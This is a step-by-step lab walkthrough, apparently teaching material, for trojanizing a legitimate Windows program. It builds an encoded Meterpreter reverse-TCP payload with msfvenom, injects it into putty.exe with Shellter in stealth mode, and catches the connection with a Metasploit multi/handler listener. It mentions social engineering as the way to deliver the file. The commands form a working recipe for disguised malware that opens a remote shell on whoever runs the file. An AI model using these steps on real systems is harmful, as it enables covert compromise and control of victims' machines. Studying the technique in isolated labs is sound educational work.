Create payload to exploit users
Note 1: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.
Note 2: these labs can only be executed on an Intel architecture - for instance, they will not work on the new Apple Silicon Macs (M1, M2, ...).
Windows 7
The Windows 7 VM
Metasploitable Framework
Metasploit Framework toolset (installed on Kali Linux by default)
You need to have the Shellter tool installed. Shellter is a dynamic shellcode injection tool used to inject exploits and Shellcode into native Windows applications.
Windows 7 IP
The IP address of the Windows 7 VM. In my case it is This may be different in your specific case.
Kali Linux IP
The IP address of the Kali Linux machine. In my case it is This may be different in your specific case.
Laboratory Workflow
The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.
Install Shellter
To install Shellter on Kali Linux, follow these steps (this process may take some time):
sudo apt update
sudo apt install shellter
sudo dpkg --add-architecture i386
sudo apt update
sudo apt -y install wine32
Produce the “malicious” payload with Metasploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 10 -f raw -o /home/kali/Desktop/PhotoEditor.raw
(note that LHOST and LPORT refer to the Kali Linux machine)
Download an executable application
This executable application will carry the “malicious” payload. We are going to use putty.exe. (32 bit version)
Inject Encoded Payload into Putty With Shellter
This will inject our Metasploit generated payload into the putty.exe
Run Shellter
Select the Auto operation: A
Select the PE Target: location of putty.exe
that was downloaded.
Wait… this takes time!
Select Enable Stealth Mode = Y
Use a custom payload = C
Select the location of the payload that was previously created with Metasploit (/home/kali/Desktop/PhotoEditor.raw
Answer that this is not a reflective DLL loader, choosing the option N.
Wait until the end of the process!
You now have a putty.exe
file properly injected with the payload.
Now you have to copy the putty.exe
to the Windows machine. This is the part where some attacker would have to do some social engineering.
Create a Metasploit reverse listener
This process will create on Metasploit a reverse TCP listener that will sit and wait for remote connections - hopefully from our “malicious” payload.
Start Metasploit
Select the module
use exploit/multi/handler
Select the payload
set PAYLOAD windows/meterpreter/reverse_tcp
Set the options for payload
set LPORT 4444
Run this exploit
Now simply wait for connections…
Run “putty.exe”
Go back to the Windows machine and run the “putty.exe” command.
Back to Metasploit
Now look at your Metasploit window… looks like we have a connection.
Interact with meterpreter
Now that you have completed this exploitation try to answer to following:
Now, what can I do with the exploitation achieved?
Which type of privileges do I have on the exploited target?
How was this accomplished?
Last updated